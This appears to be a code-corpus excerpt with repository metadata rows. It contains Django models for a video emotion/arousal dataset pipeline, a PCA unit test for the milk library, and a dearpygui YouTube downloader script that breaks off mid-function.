    def _audio_path(self):
        return os.path.join(self.base_path, "audio")
    audio_path = property(_audio_path)
    def _frame_path(self):
        return os.path.join(self.base_path, "frames")
    frame_path = property(_frame_path)
    def _ground_truth_path(self):
        return os.path.join(self.base_path, "ground_truth")
    ground_truth_path = property(_ground_truth_path)
    def _shot_boundaries_ground_truth_path(self):
        return os.path.join(self.ground_truth_path, "shot_boundaries")
    shot_boundaries_ground_truth_path = property(_shot_boundaries_ground_truth_path)
    def _video_list(self):
        # Scan the video directory: loose files get emotion None; files inside
        # a recognized emotion-named subdirectory get that emotion's enum.
        videos = list()
        for elt in os.listdir(self.video_path):
            if is_video(elt):
                videos.append((elt, None))
            elif is_emotion_dir(os.path.join(self.video_path, elt)):
                for sub_elt in os.listdir(os.path.join(self.video_path, elt)):
                    if is_video(sub_elt):
                        videos.append((sub_elt, EmotionType.get_enum_from_label(elt)))
        return videos
    video_list = property(_video_list)
    def _nb_videos(self):
        return self.videos.count()
    nb_videos = property(_nb_videos)
    # Methods
    def get_video_path(self, emotion):
        """Return the source directory for a video, per-emotion if given."""
        if emotion is not None:
            return os.path.join(self.video_path, EmotionType.labels[emotion])
        else:
            return self.video_path
    def prepare(self):
        """
        Prepare the dataset, create directories.
        """
        self.preparation_state = ComputingStateType.IN_PROGRESS
        self.save()
        logger.info("Preparing dataset %s...", self.name)
        # Check and create directories
        directories = [
            self.base_path,
            self.video_path,
            self.audio_path,
            self.converted_video_path,
            self.web_video_path,
            self.frame_path,
            self.ground_truth_path,
            self.shot_boundaries_ground_truth_path
        ]
        # Optimistically mark SUCCESS; any failed mkdir downgrades to FAILED.
        self.preparation_state = ComputingStateType.SUCCESS
        for directory in directories:
            if not mkdir_if_not_exists(directory):
                logger.error("Unable to create directory: %s", directory)
                self.preparation_state = ComputingStateType.FAILED
        self.save()
        logger.debug("Preparation for dataset %s done\n", self.name)
    def create_or_update_video(self, video_filename, emotion):
        """
        Create or update a video element, get information, and associate with the dataset

        Returns True if an existing video was updated, False if created.
        """
        updated = False
        # Create/update the multimedia element
        if self.videos.filter(full_name=video_filename).exists():
            logger.debug("Updating multimedia element for: %s", video_filename)
            updated = True
            video = self.videos.get(full_name=video_filename)
            audio_part = video.audio_part
            video_part = video.video_part
        else:
            logger.debug("Creating multimedia element for: %s", video_filename)
            video = Video()
            audio_part = AudioPart()
            video_part = VideoPart()
        video.dataset = self
        video.full_name = video_filename
        video.emotion = emotion
        video.save()
        audio_part.video = video
        audio_part.save()
        video_part.video = video
        video_part.save()
        logger.info("Video created/updated: %s", video_filename)
        return updated
    def scan_video_folder(self):
        """
        Scan video folder, look for video files, and create video instances.

        Returns [created, updated], each a list of (filename, emotion) pairs.
        """
        self.scan_state = ComputingStateType.IN_PROGRESS
        self.save()
        logger.info("Scanning video folder for dataset %s...", self.name)
        created_videos = list()
        updated_videos = list()
        # List videos
        for video_filename, emotion in self.video_list:
            if self.create_or_update_video(video_filename, emotion):
                updated_videos.append((video_filename, emotion))
            else:
                created_videos.append((video_filename, emotion))
        self.scan_state = ComputingStateType.SUCCESS
        self.save()
        logger.debug("Scanning video folder for dataset %s done\n", self.name)
        return [created_videos, updated_videos]
    def prepare_videos(self, overwrite=False):
        """
        Prepare each videos of the dataset
        """
        self.videos_preparation_nb_videos_done = 0
        self.videos_preparation_state = ComputingStateType.IN_PROGRESS
        self.save()
        logger.info("Preparing videos for dataset %s...", self.name)
        errors = False
        warnings = False
        for video in self.videos.all():
            video.prepare(overwrite=overwrite)
            if video.preparation_state == ComputingStateType.FAILED:
                errors = True
            elif video.preparation_state == ComputingStateType.WARNING:
                warnings = True
            # Save after each video so progress is published live.
            self.videos_preparation_nb_videos_done += 1
            self.save()
        if errors:
            self.videos_preparation_state = ComputingStateType.FAILED
            logger.error("Error during the preparation of videos for dataset %s\n", self.name)
        elif warnings:
            self.videos_preparation_state = ComputingStateType.WARNING
            logger.warning("Control that the preparation of videos for dataset %s has worked\n", self.name)
        else:
            self.videos_preparation_state = ComputingStateType.SUCCESS
            logger.debug("Preparing videos for dataset %s done\n", self.name)
        self.save()
    def detect_shot_boundaries(self, configuration=None):
        """
        Detect shot boundaries for each videos of the dataset.

        `configuration` is an optional list of dicts with 'value' (algorithm
        enum) and 'threshold'; without it a single ECR detector at 0.7 is used.
        """
        self.shot_boundaries_detection_nb_videos_done = 0
        self.shot_boundaries_detection_state = ComputingStateType.IN_PROGRESS
        self.save()
        logger.info("Detecting shot boundaries for dataset %s...", self.name)
        errors = False
        warnings = False
        # Prepare shot detection
        shots_detection = ShotsDetection()
        shots_detection.save()
        if configuration:
            # Build one algorithm instance per configuration entry.
            for entry in configuration:
                algorithm = None
                if(entry['value'] == ShotBoundariesDetectionAlgorithmType.COLOR_HISTOGRAM):
                    algorithm = ColorHistograms()
                    algorithm.type = ShotBoundariesDetectionAlgorithmType.COLOR_HISTOGRAM
                else:
                    algorithm = ECR()
                    algorithm.type = ShotBoundariesDetectionAlgorithmType.ECR
                algorithm.threshold = entry['threshold']
                algorithm.shots_detection = shots_detection
                algorithm.save()
        else:
            # Prepare default algorithm
            algorithm = ECR()
            algorithm.type = ShotBoundariesDetectionAlgorithmType.ECR
            algorithm.shots_detection = shots_detection
            algorithm.threshold = 0.7
            algorithm.save()
            logger.debug("Using default configuration: ECR with threshold=%s" % (algorithm.threshold))
        for video in self.videos.all():
            try:
                video.detect_shot_boundaries(shots_detection)
                if video.shot_boundaries_detection_state == ComputingStateType.FAILED:
                    errors = True
                elif video.shot_boundaries_detection_state == ComputingStateType.WARNING:
                    warnings = True
            # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit
            # and hides the actual exception — consider `except Exception` + logging.
            except:
                errors = True
            self.shot_boundaries_detection_nb_videos_done += 1
            self.save()
        if errors:
            self.shot_boundaries_detection_state = ComputingStateType.FAILED
            logger.error("Error during the detection of shot boundaries for dataset %s\n", self.name)
        elif warnings:
            self.shot_boundaries_detection_state = ComputingStateType.WARNING
            logger.warning("Control that the shot boundaries detection for dataset %s has worked\n", self.name)
        else:
            self.shot_boundaries_detection_state = ComputingStateType.SUCCESS
            logger.debug("Shot boundaries detection for dataset %s done", self.name)
        self.save()
    def extract_features(self, feature_types=None, overwrite=False):
        """Extract the given feature types for every video of the dataset."""
        self.feature_extraction_state = ComputingStateType.IN_PROGRESS
        self.feature_extraction_nb_videos_done = 0
        self.save()
        logger.info("Extracting features for dataset %s...", self.name)
        errors = False
        warnings = False
        for video in self.videos.all():
            try:
                video.extract_features(feature_types=feature_types, overwrite=overwrite)
                if video.feature_extraction_state == ComputingStateType.FAILED:
                    errors = True
                elif video.feature_extraction_state == ComputingStateType.WARNING:
                    warnings = True
            # NOTE(review): bare except — see detect_shot_boundaries.
            except:
                errors = True
            self.feature_extraction_nb_videos_done += 1
            self.save()
        if errors:
            self.feature_extraction_state = ComputingStateType.FAILED
            logger.error("Error during the features extraction for dataset %s\n", self.name)
        elif warnings:
            self.feature_extraction_state = ComputingStateType.WARNING
            logger.warning("Control that the features extraction for dataset %s has worked\n", self.name)
        else:
            self.feature_extraction_state = ComputingStateType.SUCCESS
            logger.debug("Features extraction for dataset %s done", self.name)
        if not errors:
            # Record which features are now available: replace on overwrite,
            # otherwise merge (deduplicated) with the existing list.
            if overwrite:
                self.available_features = feature_types
            else:
                self.available_features = list(set(feature_types + self.available_features))
        self.save()
    def model_arousal(self, feature_types, overwrite=False):
        """Model arousal from the given feature types for every video."""
        self.arousal_modeling_state = ComputingStateType.IN_PROGRESS
        self.arousal_modeling_nb_videos_done = 0
        self.save()
        logger.info("Modeling arousal for dataset %s...", self.name)
        errors = False
        warnings = False
        for video in self.videos.all():
            try:
                video.model_arousal(feature_types, overwrite=overwrite)
                if video.arousal_modeling_state == ComputingStateType.FAILED:
                    errors = True
                elif video.arousal_modeling_state == ComputingStateType.WARNING:
                    warnings = True
            # NOTE(review): bare except — see detect_shot_boundaries.
            except:
                errors = True
            self.arousal_modeling_nb_videos_done += 1
            self.save()
        if errors:
            self.arousal_modeling_state = ComputingStateType.FAILED
            logger.error("Error during the arousal modeling for dataset %s\n", self.name)
        elif warnings:
            self.arousal_modeling_state = ComputingStateType.WARNING
            logger.warning("Control that the arousal modeling for dataset %s has worked\n", self.name)
        else:
            self.arousal_modeling_state = ComputingStateType.SUCCESS
            logger.debug("Arousal modeling for dataset %s done", self.name)
        self.save()
#-----------------------------------------------------------------------------------------------------------------------
# Video
#-----------------------------------------------------------------------------------------------------------------------
class Video(SelfPublishModel, models.Model):
    """
    Model representing a multimedia element. A multimedia element consists of general information, an embedded video
    and an embedded audio.

    The heavy lifting (format conversion, audio extraction, shot boundary
    detection, feature extraction, arousal modeling) is delegated to helpers
    and tracked through the ``*_state`` monitoring fields.
    """
    serializer_class = VideoSerializer
    dataset = models.ForeignKey(Dataset, related_name='videos')
    shots_detections = models.ManyToManyField('video_processor.ShotsDetection', through='video_processor.VideoShotsResult')
    # Original file name, extension included.
    full_name = models.CharField(max_length=50, blank=False)
    description = models.TextField(max_length=400, blank=True)
    emotion = enum.EnumField(EmotionType, null=True, default=None)
    # Information fields (filled in from ffprobe during prepare())
    format = models.CharField(max_length=50, blank=True)
    duration = models.FloatField(default=0.)
    bitrate = models.FloatField(default=0.)
    # Time frame annotations
    #time_frame_annotations = ListField(EmbeddedModelField('timeframe_annotator.TimeFrameAnnotation'))
    # Ground truth
    shot_boundaries_ground_truth = JSONField(load_kwargs={'object_pairs_hook': collections.OrderedDict})
    # Monitoring
    preparation_state = enum.EnumField(ComputingStateType, default=ComputingStateType.NO)
    shot_boundaries_detection_state = enum.EnumField(ComputingStateType, default=ComputingStateType.NO)
    feature_extraction_state = enum.EnumField(ComputingStateType, default=ComputingStateType.NO)
    arousal_modeling_state = enum.EnumField(ComputingStateType, default=ComputingStateType.NO)
    # NOTE(review): default=[] is a shared mutable default; default=list would be
    # safer but is kept as-is to avoid a schema/migration change.
    available_features = JSONField(default=[])

    # Properties
    def _name(self):
        # File name without its extension.
        filename, extension = os.path.splitext(self.full_name)
        return filename
    name = property(_name)

    def _converted_filename(self):
        # Web-friendly container produced by prepare().
        return self.name + ".mp4"
    converted_filename = property(_converted_filename)

    def _path(self):
        # Path of the converted (mp4) video.
        return os.path.join(self.dataset.converted_video_path, self.converted_filename)
    path = property(_path)

    def _original_path(self):
        # Path of the raw source video, grouped by emotion in the dataset tree.
        return os.path.join(self.dataset.get_video_path(self.emotion), self.full_name)
    original_path = property(_original_path)

    def _audio_path(self):
        # Path of the extracted wav track.
        return os.path.join(self.dataset.audio_path, self.name + ".wav")
    audio_path = property(_audio_path)

    def _nb_frames(self):
        # Frame count estimated from duration * fps (both probed in prepare()).
        return int(self.duration * float(self.video_part.fps))
    nb_frames = property(_nb_frames)

    # Methods
    def prepare(self, overwrite=False):
        """
        Prepare video:
            - convert video format for web (mp4 + webm, copied to the web folder)
            - extract audio in .wav
            - probe and store container/audio/video information

        :param overwrite: if True, redo conversions even when output files exist
        """
        errors = False
        warnings = False
        logger.info("Prepare video: %s", self.name)
        # For monitoring
        self.preparation_state = ComputingStateType.IN_PROGRESS
        self.save()
        dataset = self.dataset
        # # Read shot boundaries ground truth
        # shot_boundaries_ground_truth = []
        # ground_truth_path = os.path.join(dataset.shot_boundaries_ground_truth_path, self.name + ".csv",)
        # if os.path.isfile(ground_truth_path):
        #     with open(ground_truth_path, "Ur") as f:
        #         for row in csv.reader(f, delimiter=','):
        #             for frame in row:
        #                 shot_boundaries_ground_truth.append(int(frame))
        # else:
        #     logger.debug("No ground truth file found for video %s", self.name)
        #
        # self.shot_boundaries_ground_truth = shot_boundaries_ground_truth
        # self.save()
        # Convert video and store in converted folder
        logger.debug("Converting video (in mp4 and webm): %s", self.full_name)
        if overwrite or not os.path.exists(self.path):
            result_state = convert_video_2_mp4(self.original_path, self.path)
            if result_state == ComputingStateType.FAILED:
                errors = True
            elif result_state == ComputingStateType.WARNING:
                warnings = True
        webm_path = replace_right(self.path, ".mp4", ".webm", 1)
        if overwrite or not os.path.exists(webm_path):
            result_state = convert_video_2_webm(self.original_path, webm_path)
            if result_state == ComputingStateType.FAILED:
                errors = True
            elif result_state == ComputingStateType.WARNING:
                warnings = True
        # Copying converted videos to web folder
        logger.debug("Copying converted videos for %s to web folder.", self.full_name)
        try:
            shutil.copy(self.path, self.dataset.web_video_path)
            shutil.copy(webm_path, self.dataset.web_video_path)
        except Exception:
            # Was a bare except; copy failures mark preparation as failed.
            errors = True
        # Extract wav and store in audio folder
        logger.debug("Extracting wav from video: %s", self.full_name)
        if overwrite or not os.path.exists(self.audio_path):
            result_state = extract_wav_from_video(self.path, self.audio_path)
            if result_state == ComputingStateType.FAILED:
                errors = True
            elif result_state == ComputingStateType.WARNING:
                warnings = True
        # Get video information from ffprobe and persist it on the three models.
        info = FFMpeg().probe(self.path)
        if info:
            self.format = info.format.format
            self.duration = info.format.duration
            self.bitrate = info.format.bitrate
            self.save()
            self.audio_part.codec = info.audio.codec
            self.audio_part.channels = info.audio.audio_channels
            self.audio_part.samplerate = info.audio.audio_samplerate
            self.audio_part.save()
            self.video_part.codec = info.video.codec
            self.video_part.width = info.video.video_width
            self.video_part.height = info.video.video_height
            self.video_part.fps = info.video.video_fps
            self.video_part.save()
        else:
            errors = True
        # For monitoring
        if errors:
            self.preparation_state = ComputingStateType.FAILED
        elif warnings:
            self.preparation_state = ComputingStateType.WARNING
        else:
            self.preparation_state = ComputingStateType.SUCCESS
        self.save()
        logger.info("Preparation done for video %s\n", self.name)

    def detect_shot_boundaries(self, shots_detection=None):
        """
        Detect shot boundaries for the video, using the given algorithm configuration, or use a default algo
        configuration (ECR with threshold 0.7).

        :param shots_detection: optional pre-configured ShotsDetection instance
        """
        self.shot_boundaries_detection_state = ComputingStateType.IN_PROGRESS
        self.save()
        if shots_detection is None:
            # Prepare shot detection
            shots_detection = ShotsDetection()
            shots_detection.save()
            # Prepare default algorithm
            algo = ECR()
            algo.shots_detection = shots_detection
            algo.threshold = 0.7
            algo.save()
            logger.debug("Using default configuration: ECR with threshold=%s" % (algo.threshold))
        try:
            # Zero detected boundaries is suspicious but not fatal -> WARNING.
            if shots_detection.detect(self) > 0:
                self.shot_boundaries_detection_state = ComputingStateType.SUCCESS
            else:
                self.shot_boundaries_detection_state = ComputingStateType.WARNING
        except Exception:
            # Was a bare except.
            self.shot_boundaries_detection_state = ComputingStateType.FAILED
        self.save()

    def extract_features(self, feature_types=None, overwrite=False):
        """
        Compute features specified in feature_types. Overwrite existing features if asked for.

        :param feature_types: iterable of FeatureType values (None means nothing to do)
        :param overwrite: if True, delete and recompute all existing features first
        """
        errors = False
        warnings = False
        self.feature_extraction_state = ComputingStateType.IN_PROGRESS
        self.save()
        logger.info("Computing features for video: %s", self.name)
        if feature_types is None:
            # Guard: the previous code iterated (and concatenated) None -> TypeError.
            feature_types = []
        if overwrite:
            # Remove all features
            logger.debug("Removing all features for video: %s" % (self.name))
            try:
                self.audio_part.features.all().delete()
                self.video_part.features.all().delete()
            except Exception:
                logger.warning("A problem occured when removing features for video: %s" % (self.name))
        for feature_type in feature_types:
            if feature_type in FeatureType.audio_features:
                multimedia_part = self.audio_part
            elif feature_type in FeatureType.video_features:
                multimedia_part = self.video_part
            else:
                # Previously an unknown type reused multimedia_part from the prior
                # iteration (or raised NameError on the first one); skip it instead.
                logger.warning("Unknown feature type %s for video: %s" % (feature_type, self.name))
                warnings = True
                continue
            if multimedia_part.features.filter(type=feature_type).exists():
                continue
            else:
                logger.debug("Creating %s features for video: %s" % (feature_type, self.name))
                features = Features()
                features.multimedia_part = multimedia_part
                features.type = feature_type
                features.save()
                result_state = features.compute()
                if result_state == ComputingStateType.FAILED:
                    errors = True
                elif result_state == ComputingStateType.WARNING:
                    warnings = True
        # For monitoring
        if errors:
            self.feature_extraction_state = ComputingStateType.FAILED
        elif warnings:
            self.feature_extraction_state = ComputingStateType.WARNING
        else:
            self.feature_extraction_state = ComputingStateType.SUCCESS
        if not errors:
            # Record which features are now available (union with previous ones
            # unless we overwrote everything).
            if overwrite:
                self.available_features = list(feature_types)
            else:
                self.available_features = list(set(list(feature_types) + self.available_features))
        self.save()
        logger.info("Features computed for video: %s", self.name)

    def model_arousal(self, feature_types, overwrite=False, configuration=None):
        """
        Build (or rebuild) the arousal curve for this video from the given features.

        :param feature_types: feature types used by the arousal model
        :param overwrite: if True, re-model even when an arousal curve exists
        :param configuration: reserved for a future model configuration (unused)
        """
        logger.info("Modeling arousal for video: %s", self.full_name)
        if hasattr(self, 'arousal') and not self.arousal is None:
            if overwrite:
                arousal = self.arousal
            else:
                # Arousal already modelled and overwrite not requested.
                return
        else:
            arousal = Arousal()
            arousal.video = self
        self.arousal_modeling_state = ComputingStateType.IN_PROGRESS
        self.save()
        try:
            arousal.model(feature_types)
            self.arousal_modeling_state = ComputingStateType.SUCCESS
        except Exception:
            # Was a bare except.
            self.arousal_modeling_state = ComputingStateType.FAILED
        self.save()
        logger.info("Arousal modelled for video: %s", self.full_name)

    def evaluate_sbd(self):
        """Evaluate every shot boundary detection result attached to this video."""
        video_shots_results = self.video_shots_results
        for video_shots_result in video_shots_results.all():
            shots_detection = video_shots_result.shots_detection
            shots_detection.evaluate(self)
class MultimediaPart(models.Model):
    """
    Abstract class, as parent class for AudioPart and VideoPart.

    NOTE(review): despite the docstring, this is not a Django abstract model
    (no ``Meta.abstract = True``), so it gets its own table and the subclasses
    use multi-table inheritance; Features.multimedia_part points at this
    concrete base — confirm before changing.
    """
    pass
class AudioPart(MultimediaPart):
    """
    Model representing the audio part of a multimedia element.

    Information fields are populated from ffprobe in Video.prepare().
    """
    # One-to-one back reference: accessible as video.audio_part
    video = models.OneToOneField(Video, related_name='audio_part')
    # Information fields
    codec = models.CharField(max_length=50, blank=True)
    channels = models.IntegerField(default=0)
    samplerate = models.FloatField(default=0.)
class VideoPart(MultimediaPart):
    """
    Model representing the video part of a multimedia element.

    Information fields are populated from ffprobe in Video.prepare().
    """
    # One-to-one back reference: accessible as video.video_part
    video = models.OneToOneField(Video, related_name='video_part')
    # Information fields
    codec = models.CharField(max_length=50, blank=True)
    width = models.IntegerField(default=0)
    height = models.IntegerField(default=0)
    fps = models.FloatField(default=0.)
#-----------------------------------------------------------------------------------------------------------------------
# Features
#-----------------------------------------------------------------------------------------------------------------------
class Features(models.Model):
    """
    One feature signal (raw, normalized and processed values) attached to a
    multimedia part (audio or video) of a Video.
    """
    multimedia_part = models.ForeignKey(MultimediaPart, related_name='features')
    type = enum.EnumField(FeatureType, default=FeatureType.ENERGY)
    values = JSONField()
    values_normalized = JSONField()
    values_processed = JSONField()

    def compute_shot_cut_density(self, video_shots_result=None):
        """
        Compute shot cut density using the video shots result passed in argument. If video shots result is not passed,
        last result is used. If no result available, create one with default algorithm parameters.
        :param video_shots_result: optional VideoShotsResult to compute from
        :return: the shot cut density signal
        """
        video = self.multimedia_part.video
        if video_shots_result:
            shot_cut_density = video_shots_result.compute_shot_cut_density()
        else:
            if video.video_shots_results.count() == 0:
                # No detection yet: run one with the default algorithm.
                video.detect_shot_boundaries()
            # TODO: need to add a selected field on video_shots_results and use it here!
            shot_cut_density = video.video_shots_results.latest('id').compute_shot_cut_density()
        return shot_cut_density

    def compute_brightness(self):
        """
        Compute the per-frame RMS brightness of the video: decode with OpenCV,
        convert to grayscale and take the RMS via PIL's ImageStat.

        :return: dict {FeatureFunctionType.VALUE: [[frame_nb, brightness], ...]}
        """
        # Create video capture
        video = self.multimedia_part.video
        capture = cv2.VideoCapture(video.path)
        brightness = list()
        frame_nb = 0
        while True:
            f, crt_frame = capture.read()
            if crt_frame is None:
                # End of video
                break
            # OpenCV stores shape as (h, w, channels); PIL wants (w, h).
            cv_size = lambda img: tuple(img.shape[1::-1])
            size = cv_size(crt_frame)
            cv_frame = cv2.cvtColor(crt_frame, cv2.COLOR_BGR2GRAY)
            im = Image.frombytes("L", size, cv_frame.tostring())
            stat = ImageStat.Stat(im)
            frame_brightness = stat.rms[0]
            brightness.append([frame_nb, frame_brightness])
            frame_nb += 1
        return {FeatureFunctionType.VALUE: brightness}

    def compute(self):
        """
        Extract the feature values for self.type and persist them in self.values.

        :return: ComputingStateType.SUCCESS, WARNING (empty result or
                 unsupported type) or FAILED (extraction raised)
        """
        # Initialize so an unsupported type falls through to WARNING instead of
        # raising NameError (extracted_features was previously possibly unbound).
        extracted_features = {}
        if self.type in FeatureType.audio_features:
            opensmile_extractor = OpensmileExtractor()
            try:
                extracted_features = opensmile_extractor.compute(self)
            except Exception as e:
                # str(e) instead of e.strerror: only OSError has .strerror, so
                # the old code raised AttributeError while reporting the error.
                logger.error(str(e))
                return ComputingStateType.FAILED
        elif self.type in FeatureType.video_features:
            if self.type == FeatureType.SHOT_CUT_DENSITY:
                try:
                    extracted_features = self.compute_shot_cut_density()
                except Exception:
                    return ComputingStateType.FAILED
            elif self.type == FeatureType.BRIGHTNESS:
                try:
                    extracted_features = self.compute_brightness()
                except Exception:
                    # Was a bare except.
                    return ComputingStateType.FAILED
        if len(extracted_features) > 0:
            self.values = extracted_features
            self.save()
            return ComputingStateType.SUCCESS
        else:
            return ComputingStateType.WARNING
| [
"d.jo3l@live.com"
] | d.jo3l@live.com |
b5876dc9d96aa0353a010e6ab41149777db2839f | 826d6d3a2f691046bc65d25d00a23d1b4444c4d5 | /tecpython/lib/python3.7/_dummy_thread.py | 6b010bea891f9bf63be652923541c8da3127db17 | [] | no_license | oscargarciahernandez/QuesiQuieroOquesiTeqno | e3391d56329d84d52ad4a61270dab8bef34db15c | 2f7024f08a6de6a84d0fb5f40832df70aee48c6f | refs/heads/master | 2023-01-19T22:43:44.789533 | 2020-11-23T13:07:20 | 2020-11-23T13:07:20 | 285,193,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 50 | py | /home/ai5/anaconda3/lib/python3.7/_dummy_thread.py | [
"proyectoroseo@gmail.com"
] | proyectoroseo@gmail.com |
09b3a389b1084df14d4c4a8c2f0930a95a481b25 | 44a7330dfa4fe321eb432ee57a32328578dec109 | /milk/tests/test_pca.py | e543aff8ebdf2506e861097e21e31271cf4bb07d | [
"MIT"
] | permissive | tzuryby/milk | 7cb6760fad600e9e0d0c9216dc749db289b596fb | a7159b748414d4d095741978fb994c4affcf6b9b | refs/heads/master | 2020-12-29T02:45:33.044864 | 2011-03-15T20:23:29 | 2011-03-15T20:25:11 | 1,485,748 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 472 | py | import numpy.random
import milk.unsupervised.pca
import numpy as np
def test_pca():
    """PCA smoke test: projecting back from the components should reconstruct
    the (z-scored) data with small relative error."""
    # Fixed seed so the synthetic fixture (and hence the PCA result) is reproducible.
    numpy.random.seed(123)
    X = numpy.random.rand(10,4)
    # Make columns 1 and 2 correlated with column 0 so the data has a clear
    # low-dimensional structure for PCA to capture.
    # NOTE(review): the next line is duplicated (likely a copy-paste); removing
    # it would change the random stream and the fixture, so it is kept as-is.
    X[:,1] += numpy.random.rand(10)**2*X[:,0]
    X[:,1] += numpy.random.rand(10)**2*X[:,0]
    X[:,2] += numpy.random.rand(10)**2*X[:,0]
    Y,V = milk.unsupervised.pca(X)
    Xn = milk.unsupervised.normalise.zscore(X)
    assert X.shape == Y.shape
    # Reconstruction from the first 4 components must explain at least 70% of
    # the variance of the z-scored data (relative squared error < 0.3).
    assert ((np.dot(V[:4].T,Y[:,:4].T).T-Xn)**2).sum()/(Xn**2).sum() < .3
| [
"lpc@cmu.edu"
] | lpc@cmu.edu |
531d55b58e3c9467b232a7cc8f8185b0e9295939 | 08b3c2cb6cb9df8a8779e82eb9faef0df7e137ab | /src/dpg-yt-dl.py | 18601796ccbcaa9709a24c98e43d7357d6361dc4 | [] | no_license | RNubla/dearpygui-ytdl | 0e9332552c46acda4605faf4c67ea635a373dcaf | 1acbee275d56279337576353e98eb20acec05f23 | refs/heads/main | 2023-06-19T20:36:39.532886 | 2021-07-14T18:47:10 | 2021-07-14T18:47:10 | 385,402,833 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,311 | py | from knownpaths import FOLDERID
import dearpygui.dearpygui as dpg
import re
import pafy
from moviepy.editor import *
import os
from my_mvLogger import myMvLogger
# from knownpaths import folderid
import knownpaths as kp
from screeninfo import get_monitors
# create viewport takes in config options too!
# Tag for the main window, generated up front so both the window declaration
# and the callbacks/logger sizing below can reference it.
primary_window = dpg.generate_uuid()
class YTDL:
    """
    GUI-backed YouTube downloader: fetches the available audio/video streams
    for a URL with pafy, lets the user pick a quality for each, downloads both
    parts separately and merges them with ffmpeg (via moviepy).

    NOTE(review): output paths are built with a literal backslash separator,
    so this class is Windows-only as written.
    """
    def __init__(self):
        self.video = None
        self.available_streams = []
        self.available_video_streams = []
        self.available_audio_streams = []
        # Output directory chosen through the file dialog.
        self.file_path = None
        self.file_path_text_widget = None
        self.video_quality_list = []
        self.audio_quality_list = []
        # Indices of the streams selected in the two combo boxes.
        self.video_element_selected_index = None
        self.audio_element_selected_index = None
        self.video_title = ''
        self.audio_title = ''
        self.video_extension = None
        self.audio_extension = None
        self.video_url = None
        self.audio_url = None
        # Widget tags (assigned to actual widgets at script level).
        self.video_quality_listbox_id = dpg.generate_uuid()
        self.audio_quality_listbox_id = dpg.generate_uuid()
        self.url_input_text_id = dpg.generate_uuid()
        self.logger = None
        # self.logger = myMvLogger(0, dpg.get_item_height(
        #     item=primary_window), 'Log information', width=dpg.get_item_width(item=primary_window), height=500)

    def select_audio_stream_quality(self, sender, user_data):
        """Combo callback: record the chosen audio stream's extension, index and URL."""
        # user_data is the pafy stream repr, e.g. "audio:m4a@128k".
        audio_re = re.search('audio:(.*)@', user_data)
        self.audio_extension = audio_re.group(1)
        self.logger.log_info(f'Audio Extension: {self.audio_extension}')
        temp_available_audio_stream_str = [
            str(x) for x in self.available_audio_streams]
        self.audio_element_selected_index = temp_available_audio_stream_str.index(
            user_data)
        self.audio_url = self.available_audio_streams[self.audio_element_selected_index].url

    def select_video_stream_quality(self, sender, user_data):
        """Combo callback: record the chosen video stream's extension, index and URL."""
        video_re = re.search('video:(.*)@', user_data)
        self.video_extension = video_re.group(1)
        self.logger.log_info(f'Video Extension: {self.video_extension}')
        temp_available_video_stream_str = [
            str(x) for x in self.available_video_streams]
        self.video_element_selected_index = temp_available_video_stream_str.index(
            user_data)
        self.video_url = self.available_video_streams[self.video_element_selected_index].url

    def get_video_info(self):
        """Fetch stream metadata for the entered URL and populate both combos."""
        url = str(dpg.get_value(self.url_input_text_id))
        print(url)
        self.video = pafy.new(url=url)
        # check if title has ':' or '|' or both;
        # if they do, then replace those characters with and '_'
        self.video_title = str(self.video.title)
        # NOTE(review): the last operand `':' and '|' in str(...)` evaluates as
        # `('|' in title)` due to precedence, so the condition is effectively
        # ':' in title or '|' in title — confirm intent.
        if ':' in str(self.video.title) or '|' in str(self.video.title) or ':' and '|' in str(self.video.title):
            # self.audio_title = str(self.video.title)
            self.video_title = self.video_title.replace(':', '_')
            self.audio_title = self.video_title.replace(':', '_')
            self.video_title = self.video_title.replace('|', '_')
            self.audio_title = self.video_title.replace('|', '_')
        print(self.video_title)
        # self.allstreams = self.video.allstreams
        self.available_video_streams = [
            (x) for x in self.video.allstreams if 'video' in str(x)]
        self.logger.log_info(str(self.available_video_streams))
        # self.logger.log(str(self.available_video_streams))
        # AUDIO
        self.available_audio_streams = [
            x for x in self.video.allstreams if 'audio' in str(x)]
        self.logger.log_info(str(self.available_audio_streams))
        # print(str(self.available_video_streams))
        dpg.configure_item(item=self.video_quality_list,
                           items=self.available_video_streams, callback=self.select_video_stream_quality, user_data='USER_DATA')
        dpg.configure_item(item=self.audio_quality_list,
                           items=self.available_audio_streams, callback=self.select_audio_stream_quality, user_data='USER_DATA')

    def merge_video_and_audio(self):
        """Mux the downloaded -v and -a temp files into one output (stream copy, no re-encode)."""
        ffmpeg_tools.ffmpeg_merge_video_audio(
            video=f'{str(self.file_path)}\{str(self.video_title)}-v.{str(self.video_extension)}', audio=f'{str(self.file_path)}\{str(self.video_title)}-a.{str(self.audio_extension)}', output=f'{str(self.file_path)}\{str(self.video_title)}.{str(self.video_extension)}', vcodec='copy', acodec='copy')

    def cleanup_files(self):
        """Delete the temporary -v/-a part files left after merging."""
        os.remove(
            f'{self.file_path}\{self.video_title}-v.{self.video_extension}')
        os.remove(
            f'{self.file_path}\{self.video_title}-a.{self.audio_extension}')

    def output_folder(self, sender, app_data, user_data):
        """File-dialog callback: remember the chosen directory and show it in the UI."""
        self.file_path = app_data['current_path']
        # print(app_data['current_path'])
        dpg.configure_item(item=self.file_path_text_widget,
                           default_value=f'{self.file_path}')
        print(self.file_path)

    def download_files(self):
        """Download the selected audio and video streams, merge them, clean up,
        then open the output folder in Explorer."""
        # self.logger.log_debug(f'Video_title: {self.video_title}')
        self.logger.log_info('Downloading Audio Please Wait....')
        self.logger.log_debug(
            f'VIDEO: {self.video_title}.{self.video_extension}')
        self.available_audio_streams[self.audio_element_selected_index].download(
            quiet=False, filepath=f'{self.file_path}\{self.video_title}-a.{self.audio_extension}')
        # print(self.audio_url)
        self.logger.log_info('Downloading Video Please Wait....')
        self.logger.log_debug(
            f'Audio: {self.video_title}.{self.audio_extension}')
        self.logger.log_debug(
            f'{self.video_url}')
        # print(self.video_url)
        self.available_video_streams[self.video_element_selected_index].download(
            quiet=False, filepath=f'{str(self.file_path)}\{str(self.video_title)}-v.{str(self.video_extension)}')
        self.logger.log_info('Merging Audio and Video; Please wait....')
        self.merge_video_and_audio()
        self.logger.log_info('Removing Temp Files....')
        self.cleanup_files()
        self.logger.log_info('Done')
        os.startfile(self.file_path)
def hexToRGB(hex: str) -> tuple:
    """Convert a hex color string to an (R, G, B) tuple of ints.
